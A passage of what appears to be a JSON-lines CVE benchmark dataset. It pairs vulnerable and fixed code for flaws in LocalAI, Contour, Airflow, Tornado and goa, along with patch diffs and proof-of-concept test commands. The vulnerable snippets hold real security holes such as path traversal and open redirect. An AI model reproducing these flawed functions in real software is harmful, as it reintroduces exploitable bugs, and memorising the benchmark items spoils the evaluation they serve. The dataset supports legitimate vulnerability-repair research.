-e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2018-14574/bin/python ./runtests.py middleware.tests\n"} {"cve_id": "CVE-2024-5182", "cve_description": "A path traversal vulnerability exists in mudler/localai version 2.14.0, where an attacker can exploit the `model` parameter during the model deletion process to delete arbitrary files. Specifically, by crafting a request with a manipulated `model` parameter, an attacker can traverse the directory structure and target files outside of the intended directory, leading to the deletion of sensitive data. 
This vulnerability is due to insufficient input validation and sanitization of the `model` parameter.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mudler/localai", "patch_url": ["https://github.com/mudler/localai/commit/1a3dedece06cab1acc3332055d285ac540a47f0e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_275_1", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 137, "end_line": 149, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigFile(file string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tc, err := ReadBackendConfigFile(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot load config file: %w\", err)\n\t}\n\n\tfor _, cc := range c {\n\t\tcm.configs[cc.Name] = *cc\n\t}\n\treturn nil\n}"}, {"id": "vul_go_275_2", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 151, "end_line": 161, "snippet": "func (cl *BackendConfigLoader) LoadBackendConfig(file string, opts ...ConfigLoaderOption) error {\n\tcl.Lock()\n\tdefer cl.Unlock()\n\tc, err := ReadBackendConfig(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n\t}\n\n\tcl.configs[c.Name] = *c\n\treturn nil\n}"}, {"id": "vul_go_275_3", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 295, "end_line": 323, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigsFromPath(path string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tentries, err := os.ReadDir(path)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfiles := make([]fs.FileInfo, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tinfo, err := entry.Info()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfiles = append(files, info)\n\t}\n\tfor _, file := range files {\n\t\t// Skip templates, YAML and .keep files\n\t\tif !strings.Contains(file.Name(), \".yaml\") && !strings.Contains(file.Name(), \".yml\") ||\n\t\t\tstrings.HasPrefix(file.Name(), \".\") {\n\t\t\tcontinue\n\t\t}\n\t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n\t\tif err == nil {\n\t\t\tcm.configs[c.Name] = *c\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_275_1", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 137, "end_line": 151, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigFile(file string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tc, err := ReadBackendConfigFile(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot load config file: %w\", err)\n\t}\n\n\tfor _, cc := range c {\n\t\tif cc.Validate() {\n\t\t\tcm.configs[cc.Name] = *cc\n\t\t}\n\t}\n\treturn 
nil\n}"}, {"id": "fix_go_275_2", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 153, "end_line": 168, "snippet": "func (cl *BackendConfigLoader) LoadBackendConfig(file string, opts ...ConfigLoaderOption) error {\n\tcl.Lock()\n\tdefer cl.Unlock()\n\tc, err := ReadBackendConfig(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n\t}\n\n\tif c.Validate() {\n\t\tcl.configs[c.Name] = *c\n\t} else {\n\t\treturn fmt.Errorf(\"config is not valid\")\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_275_3", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 302, "end_line": 336, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigsFromPath(path string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tentries, err := os.ReadDir(path)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read directory '%s': %w\", path, err)\n\t}\n\tfiles := make([]fs.FileInfo, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tinfo, err := entry.Info()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfiles = append(files, info)\n\t}\n\tfor _, file := range files {\n\t\t// Skip templates, YAML and .keep files\n\t\tif !strings.Contains(file.Name(), \".yaml\") && !strings.Contains(file.Name(), \".yml\") ||\n\t\t\tstrings.HasPrefix(file.Name(), \".\") {\n\t\t\tcontinue\n\t\t}\n\t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n\t\tif err != nil {\n\t\t\tlog.Error().Err(err).Msgf(\"cannot read config file: %s\", file.Name())\n\t\t\tcontinue\n\t\t}\n\t\tif c.Validate() {\n\t\t\tcm.configs[c.Name] = *c\n\t\t} else {\n\t\t\tlog.Error().Err(err).Msgf(\"config is not valid\")\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -7,7 +7,9 @@\n \t}\n \n \tfor _, cc := range c {\n-\t\tcm.configs[cc.Name] = *cc\n+\t\tif cc.Validate() {\n+\t\t\tcm.configs[cc.Name] = *cc\n+\t\t}\n \t}\n \treturn nil\n }\n\n--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -6,6 +6,11 @@\n \t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n \t}\n \n-\tcl.configs[c.Name] = *c\n+\tif c.Validate() {\n+\t\tcl.configs[c.Name] = *c\n+\t} else {\n+\t\treturn fmt.Errorf(\"config is not valid\")\n+\t}\n+\n \treturn nil\n }\n\n--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -3,7 +3,7 @@\n \tdefer cm.Unlock()\n \tentries, err := os.ReadDir(path)\n \tif err != nil {\n-\t\treturn err\n+\t\treturn fmt.Errorf(\"cannot read directory '%s': %w\", path, err)\n \t}\n \tfiles := make([]fs.FileInfo, 0, len(entries))\n \tfor _, entry := range entries {\n@@ -20,8 +20,14 @@\n \t\t\tcontinue\n \t\t}\n \t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n-\t\tif err == nil {\n+\t\tif err != nil {\n+\t\t\tlog.Error().Err(err).Msgf(\"cannot read config file: %s\", file.Name())\n+\t\t\tcontinue\n+\t\t}\n+\t\tif c.Validate() {\n \t\t\tcm.configs[c.Name] = *c\n+\t\t} else {\n+\t\t\tlog.Error().Err(err).Msgf(\"config is not valid\")\n \t\t}\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32783", "cve_description": "Contour is a Kubernetes ingress controller using Envoy proxy. 
In Contour before version 1.17.1 a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.", "cwe_info": {"CWE-610": {"name": "Externally Controlled Reference to a Resource in Another Sphere", "description": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere."}}, "repo": "https://github.com/projectcontour/contour", "patch_url": ["https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_42_1", "commit": "b8136f7", "file_path": "internal/dag/accessors.go", "start_line": 54, "end_line": 79, "snippet": "func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache) (*Service, error) {\n\tsvc, svcPort, err := cache.LookupService(meta, port)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif dagSvc := dag.GetService(k8s.NamespacedNameOf(svc), svcPort.Port); dagSvc != nil {\n\t\treturn dagSvc, nil\n\t}\n\n\tdagSvc := &Service{\n\t\tWeighted: WeightedService{\n\t\t\tServiceName: svc.Name,\n\t\t\tServiceNamespace: svc.Namespace,\n\t\t\tServicePort: svcPort,\n\t\t\tWeight: 1,\n\t\t},\n\t\tProtocol: upstreamProtocol(svc, svcPort),\n\t\tMaxConnections: annotation.MaxConnections(svc),\n\t\tMaxPendingRequests: annotation.MaxPendingRequests(svc),\n\t\tMaxRequests: annotation.MaxRequests(svc),\n\t\tMaxRetries: annotation.MaxRetries(svc),\n\t\tExternalName: externalName(svc),\n\t}\n\treturn dagSvc, nil\n}"}], "fix_func": [{"id": "fix_go_42_1", "commit": "b53a5c4", "file_path": "internal/dag/accessors.go", "start_line": 54, "end_line": 84, "snippet": "func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache, enableExternalNameSvc bool) (*Service, error) {\n\tsvc, svcPort, err := cache.LookupService(meta, port)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = validateExternalName(svc, enableExternalNameSvc)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif dagSvc := dag.GetService(k8s.NamespacedNameOf(svc), svcPort.Port); dagSvc != nil {\n\t\treturn dagSvc, nil\n\t}\n\n\tdagSvc := &Service{\n\t\tWeighted: WeightedService{\n\t\t\tServiceName: svc.Name,\n\t\t\tServiceNamespace: svc.Namespace,\n\t\t\tServicePort: svcPort,\n\t\t\tWeight: 1,\n\t\t},\n\t\tProtocol: upstreamProtocol(svc, svcPort),\n\t\tMaxConnections: annotation.MaxConnections(svc),\n\t\tMaxPendingRequests: annotation.MaxPendingRequests(svc),\n\t\tMaxRequests: 
annotation.MaxRequests(svc),\n\t\tMaxRetries: annotation.MaxRetries(svc),\n\t\tExternalName: externalName(svc),\n\t}\n\treturn dagSvc, nil\n}"}, {"id": "fix_go_42_2", "commit": "b53a5c4", "file_path": "internal/dag/accessors.go", "start_line": 86, "end_line": 116, "snippet": "func validateExternalName(svc *v1.Service, enableExternalNameSvc bool) error {\n\n\t// If this isn't an ExternalName Service, we're all good here.\n\ten := externalName(svc)\n\tif en == \"\" {\n\t\treturn nil\n\t}\n\n\t// If ExternalNames are disabled, then we don't want to add this to the DAG.\n\tif !enableExternalNameSvc {\n\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service, these are not currently enabled. See the config.enableExternalNameService config file setting\", svc.Namespace, svc.Name)\n\t}\n\n\t// Check against a list of known localhost names, using a map to approximate a set.\n\t// TODO(youngnick) This is a very porous hack, and we should probably look into doing a DNS\n\t// lookup to check what the externalName resolves to, but I'm worried about the\n\t// performance impact of doing one or more DNS lookups per DAG run, so we're\n\t// going to go with a specific blocklist for now.\n\tlocalhostNames := map[string]struct{}{\n\t\t\"localhost\": {},\n\t\t\"localhost.localdomain\": {},\n\t\t\"local.projectcontour.io\": {},\n\t}\n\n\t_, localhost := localhostNames[en]\n\tif localhost {\n\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service that points to localhost, this is not allowed\", svc.Namespace, svc.Name)\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/internal/dag/accessors.go\n+++ b/internal/dag/accessors.go\n@@ -1,5 +1,10 @@\n-func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache) (*Service, error) {\n+func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache, enableExternalNameSvc bool) (*Service, error) {\n \tsvc, svcPort, err := cache.LookupService(meta, port)\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\terr = validateExternalName(svc, enableExternalNameSvc)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n\n--- /dev/null\n+++ b/internal/dag/accessors.go\n@@ -0,0 +1,31 @@\n+func validateExternalName(svc *v1.Service, enableExternalNameSvc bool) error {\n+\n+\t// If this isn't an ExternalName Service, we're all good here.\n+\ten := externalName(svc)\n+\tif en == \"\" {\n+\t\treturn nil\n+\t}\n+\n+\t// If ExternalNames are disabled, then we don't want to add this to the DAG.\n+\tif !enableExternalNameSvc {\n+\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service, these are not currently enabled. 
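The validateExternalName helper shown in this Contour record's fix_func is small enough to restate. The Python transcription below only illustrates its two checks (feature gate, then localhost blocklist); the Go original in the record is authoritative, and the blocklist is acknowledged as porous by the record's own TODO comment.

```python
# Illustrative Python transcription of validateExternalName from the Contour
# fix above; the Go original in the record is the real implementation.
LOCALHOST_NAMES = {"localhost", "localhost.localdomain", "local.projectcontour.io"}

def validate_external_name(external_name: str, enable_external_name_svc: bool) -> None:
    if not external_name:                 # not an ExternalName service: fine
        return
    if not enable_external_name_svc:      # feature disabled: refuse outright
        raise ValueError("ExternalName services are not enabled")
    if external_name in LOCALHOST_NAMES:  # porous blocklist, per the TODO
        raise ValueError("ExternalName points to localhost; not allowed")

validate_external_name("example.com", enable_external_name_svc=True)  # ok
# validate_external_name("localhost", True) would raise ValueError
```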
See the config.enableExternalNameService config file setting\", svc.Namespace, svc.Name)\n+\t}\n+\n+\t// Check against a list of known localhost names, using a map to approximate a set.\n+\t// TODO(youngnick) This is a very porous hack, and we should probably look into doing a DNS\n+\t// lookup to check what the externalName resolves to, but I'm worried about the\n+\t// performance impact of doing one or more DNS lookups per DAG run, so we're\n+\t// going to go with a specific blocklist for now.\n+\tlocalhostNames := map[string]struct{}{\n+\t\t\"localhost\": {},\n+\t\t\"localhost.localdomain\": {},\n+\t\t\"local.projectcontour.io\": {},\n+\t}\n+\n+\t_, localhost := localhostNames[en]\n+\tif localhost {\n+\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service that points to localhost, this is not allowed\", svc.Namespace, svc.Name)\n+\t}\n+\n+\treturn nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32783:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/contour\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestBuilderLookupService$ github.com/projectcontour/contour/internal/dag\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-45034", "cve_description": "Apache Airflow versions before 2.10.1 have a vulnerability that allows\u00a0DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. \nUsers are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/03e01e76d2203d37aa645096df195b4328665f6d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_176_1", "commit": "ceb6051", "file_path": "airflow/settings.py", "start_line": 678, "end_line": 690, "snippet": "def prepare_syspath():\n \"\"\"Ensure certain subfolders of AIRFLOW_HOME are on the classpath.\"\"\"\n if DAGS_FOLDER not in sys.path:\n sys.path.append(DAGS_FOLDER)\n\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n if config_path not in sys.path:\n sys.path.append(config_path)\n\n if PLUGINS_FOLDER not in sys.path:\n sys.path.append(PLUGINS_FOLDER)"}, {"id": "vul_py_176_2", "commit": "ceb6051", "file_path": "airflow/settings.py", "start_line": 771, "end_line": 793, "snippet": "def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n prepare_syspath()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n 
load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n global LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n configure_adapters()\n # The webservers import this file from models.py with the default settings.\n configure_orm()\n configure_action_logging()\n\n # Run any custom runtime checks that needs to be executed for providers\n run_providers_custom_runtime_checks()\n\n # Ensure we close DB connections at scheduler and gunicorn worker terminations\n atexit.register(dispose_orm)"}], "fix_func": [{"id": "fix_py_176_1", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 678, "end_line": 687, "snippet": "def prepare_syspath_for_config_and_plugins():\n \"\"\"Update sys.path for the config and plugins directories.\"\"\"\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n if config_path not in sys.path:\n sys.path.append(config_path)\n\n if PLUGINS_FOLDER not in sys.path:\n sys.path.append(PLUGINS_FOLDER)"}, {"id": "fix_py_176_2", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 774, "end_line": 797, "snippet": "def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n prepare_syspath_for_config_and_plugins()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n prepare_syspath_for_dags_folder()\n global LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n configure_adapters()\n # The webservers import this file from models.py with the default settings.\n configure_orm()\n configure_action_logging()\n\n # Run any custom runtime checks that needs to be executed for providers\n run_providers_custom_runtime_checks()\n\n # Ensure we close DB connections at scheduler and gunicorn worker terminations\n atexit.register(dispose_orm)"}, {"id": "fix_py_176_3", "commit": "03e01e7", "file_path": "airflow/settings.py", "start_line": 690, "end_line": 693, "snippet": "def prepare_syspath_for_dags_folder():\n \"\"\"Update sys.path to include the DAGs folder.\"\"\"\n if DAGS_FOLDER not in sys.path:\n sys.path.append(DAGS_FOLDER)"}], "vul_patch": "--- a/airflow/settings.py\n+++ b/airflow/settings.py\n@@ -1,8 +1,5 @@\n-def prepare_syspath():\n- \"\"\"Ensure certain subfolders of AIRFLOW_HOME are on the classpath.\"\"\"\n- if DAGS_FOLDER not in sys.path:\n- sys.path.append(DAGS_FOLDER)\n-\n+def prepare_syspath_for_config_and_plugins():\n+ \"\"\"Update sys.path for the config and plugins directories.\"\"\"\n # Add ./config/ for loading custom log parsers etc, or\n # airflow_local_settings etc.\n config_path = os.path.join(AIRFLOW_HOME, \"config\")\n\n--- a/airflow/settings.py\n+++ b/airflow/settings.py\n@@ -1,12 +1,13 @@\n def initialize():\n \"\"\"Initialize Airflow with all the settings from this file.\"\"\"\n configure_vars()\n- prepare_syspath()\n+ prepare_syspath_for_config_and_plugins()\n configure_policy_plugin_manager()\n # Load policy plugins _before_ importing airflow_local_settings, as Pluggy uses LIFO and we want anything\n # in airflow_local_settings to take precendec\n load_policy_plugins(POLICY_PLUGIN_MANAGER)\n import_local_settings()\n+ prepare_syspath_for_dags_folder()\n global 
LOGGING_CLASS_PATH\n LOGGING_CLASS_PATH = configure_logging()\n State.state_color.update(STATE_COLORS)\n\n--- /dev/null\n+++ b/airflow/settings.py\n@@ -0,0 +1,4 @@\n+def prepare_syspath_for_dags_folder():\n+ \"\"\"Update sys.path to include the DAGs folder.\"\"\"\n+ if DAGS_FOLDER not in sys.path:\n+ sys.path.append(DAGS_FOLDER)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-28370", "cve_description": "Open redirect vulnerability in Tornado versions 6.3.1 and earlier allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/tornadoweb/tornado", "patch_url": ["https://github.com/tornadoweb/tornado/commit/32ad07c54e607839273b4e1819c347f5c8976b2f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_351_1", "commit": "e0fa53ee96db720dc7800d0248c39a4ffb8911e9", "file_path": "tornado/web.py", "start_line": 2841, "end_line": 2889, "snippet": " def validate_absolute_path(self, root: str, absolute_path: str) -> Optional[str]:\n \"\"\"Validate and return the absolute path.\n\n ``root`` is the configured path for the `StaticFileHandler`,\n and ``path`` is the result of `get_absolute_path`\n\n This is an instance method called during request processing,\n so it may raise `HTTPError` or use methods like\n `RequestHandler.redirect` (return None after redirecting to\n halt further processing). This is where 404 errors for missing files\n are generated.\n\n This method may modify the path before returning it, but note that\n any such modifications will not be understood by `make_static_url`.\n\n In instance methods, this method's result is available as\n ``self.absolute_path``.\n\n .. versionadded:: 3.1\n \"\"\"\n # os.path.abspath strips a trailing /.\n # We must add it back to `root` so that we only match files\n # in a directory named `root` instead of files starting with\n # that prefix.\n root = os.path.abspath(root)\n if not root.endswith(os.path.sep):\n # abspath always removes a trailing slash, except when\n # root is '/'. 
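The Airflow record that closes above hinges entirely on sys.path ordering: the patch defers appending DAGS_FOLDER until after airflow_local_settings has been imported, so a DAG author cannot shadow trusted settings with a file in the DAG folder. A minimal runnable sketch of that ordering, with illustrative paths and a stand-in importer:

```python
# Sketch of why the Airflow fix reorders initialize(): whichever sys.path
# entry holds an airflow_local_settings.py first wins, so the untrusted DAG
# folder must be appended only after the trusted import has happened.
# Paths and the importer below are illustrative stand-ins.
import sys

CONFIG_DIR = "/opt/airflow/config"   # trusted, admin-controlled (illustrative)
DAGS_FOLDER = "/opt/airflow/dags"    # writable by DAG authors (illustrative)

def import_local_settings():
    # stand-in for Airflow's real importer; ordering is the whole game
    print("import resolved against:", sys.path)

def initialize():
    sys.path.append(CONFIG_DIR)   # trusted location first
    import_local_settings()       # runs while only trusted paths are visible
    sys.path.append(DAGS_FOLDER)  # untrusted folder is appended afterwards

initialize()
```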
This is an unusual case, but several projects\n # have independently discovered this technique to disable\n # Tornado's path validation and (hopefully) do their own,\n # so we need to support it.\n root += os.path.sep\n # The trailing slash also needs to be temporarily added back\n # the requested path so a request to root/ will match.\n if not (absolute_path + os.path.sep).startswith(root):\n raise HTTPError(403, \"%s is not in root static directory\", self.path)\n if os.path.isdir(absolute_path) and self.default_filename is not None:\n # need to look at the request.path here for when path is empty\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n if not os.path.exists(absolute_path):\n raise HTTPError(404)\n if not os.path.isfile(absolute_path):\n raise HTTPError(403, \"%s is not a file\", self.path)\n return absolute_path"}], "fix_func": [{"id": "fix_py_351_1", "commit": "32ad07c54e607839273b4e1819c347f5c8976b2f", "file_path": "tornado/web.py", "start_line": 2841, "end_line": 2898, "snippet": " def validate_absolute_path(self, root: str, absolute_path: str) -> Optional[str]:\n \"\"\"Validate and return the absolute path.\n\n ``root`` is the configured path for the `StaticFileHandler`,\n and ``path`` is the result of `get_absolute_path`\n\n This is an instance method called during request processing,\n so it may raise `HTTPError` or use methods like\n `RequestHandler.redirect` (return None after redirecting to\n halt further processing). This is where 404 errors for missing files\n are generated.\n\n This method may modify the path before returning it, but note that\n any such modifications will not be understood by `make_static_url`.\n\n In instance methods, this method's result is available as\n ``self.absolute_path``.\n\n .. versionadded:: 3.1\n \"\"\"\n # os.path.abspath strips a trailing /.\n # We must add it back to `root` so that we only match files\n # in a directory named `root` instead of files starting with\n # that prefix.\n root = os.path.abspath(root)\n if not root.endswith(os.path.sep):\n # abspath always removes a trailing slash, except when\n # root is '/'. 
This is an unusual case, but several projects\n # have independently discovered this technique to disable\n # Tornado's path validation and (hopefully) do their own,\n # so we need to support it.\n root += os.path.sep\n # The trailing slash also needs to be temporarily added back\n # the requested path so a request to root/ will match.\n if not (absolute_path + os.path.sep).startswith(root):\n raise HTTPError(403, \"%s is not in root static directory\", self.path)\n if os.path.isdir(absolute_path) and self.default_filename is not None:\n # need to look at the request.path here for when path is empty\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n if self.request.path.startswith(\"//\"):\n # A redirect with two initial slashes is a \"protocol-relative\" URL.\n # This means the next path segment is treated as a hostname instead\n # of a part of the path, making this effectively an open redirect.\n # Reject paths starting with two slashes to prevent this.\n # This is only reachable under certain configurations.\n raise HTTPError(\n 403, \"cannot redirect path with two initial slashes\"\n )\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n if not os.path.exists(absolute_path):\n raise HTTPError(404)\n if not os.path.isfile(absolute_path):\n raise HTTPError(403, \"%s is not a file\", self.path)\n return absolute_path"}], "vul_patch": "--- a/tornado/web.py\n+++ b/tornado/web.py\n@@ -39,6 +39,15 @@\n # but there is some prefix to the path that was already\n # trimmed by the routing\n if not self.request.path.endswith(\"/\"):\n+ if self.request.path.startswith(\"//\"):\n+ # A redirect with two initial slashes is a \"protocol-relative\" URL.\n+ # This means the next path segment is treated as a hostname instead\n+ # of a part of the path, making this effectively an open redirect.\n+ # Reject paths starting with two slashes to prevent this.\n+ # This is only reachable under certain configurations.\n+ raise HTTPError(\n+ 403, \"cannot redirect path with two initial slashes\"\n+ )\n self.redirect(self.request.path + \"/\", permanent=True)\n return None\n absolute_path = os.path.join(absolute_path, self.default_filename)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-25073", "cve_description": "Improper path sanitization in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/goadesign/goa", "patch_url": ["https://github.com/goadesign/goa/commit/70b5a199d0f813d74423993832c424e1fc73fb39"], "programing_language": "Go", "vul_func": [{"id": "vul_go_223_1", "commit": "4f2e802", "file_path": "service.go", "start_line": 366, "end_line": 416, 
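The Tornado record that ends above adds a single guard before the trailing-slash redirect. The sketch below restates why in plain Python: a Location value beginning with "//" is a protocol-relative URL, so the next path segment becomes a hostname and the redirect becomes open.

```python
# Sketch of the guard added in the Tornado fix: "//evil.example/x" in a
# Location header means "http(s)://evil.example/x" to a browser, so the
# handler must refuse such paths instead of appending "/" and redirecting.
def redirect_target(request_path: str) -> str:
    if request_path.startswith("//"):
        raise PermissionError("cannot redirect path with two initial slashes")
    return request_path + "/"

assert redirect_target("/static/docs") == "/static/docs/"
try:
    redirect_target("//evil.example/static")
except PermissionError as e:
    print(e)  # refused: would otherwise be an open redirect
```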
"snippet": "func (ctrl *Controller) FileHandler(path, filename string) Handler {\n\tvar wc string\n\tif idx := strings.LastIndex(path, \"/*\"); idx > -1 && idx < len(path)-1 {\n\t\twc = path[idx+2:]\n\t\tif strings.Contains(wc, \"/\") {\n\t\t\twc = \"\"\n\t\t}\n\t}\n\treturn func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n\t\tfname := filename\n\t\tif len(wc) > 0 {\n\t\t\tif m, ok := ContextRequest(ctx).Params[wc]; ok {\n\t\t\t\tfname = filepath.Join(filename, m[0])\n\t\t\t}\n\t\t}\n\t\tLogInfo(ctx, \"serve file\", \"name\", fname, \"route\", req.URL.Path)\n\t\tdir, name := filepath.Split(fname)\n\t\tfs := ctrl.FileSystem(dir)\n\t\tf, err := fs.Open(name)\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\tdefer f.Close()\n\t\td, err := f.Stat()\n\t\tif err != nil {\n\t\t\treturn ErrInvalidFile(err)\n\t\t}\n\t\t// use contents of index.html for directory, if present\n\t\tif d.IsDir() {\n\t\t\tindex := strings.TrimSuffix(name, \"/\") + \"/index.html\"\n\t\t\tff, err := fs.Open(index)\n\t\t\tif err == nil 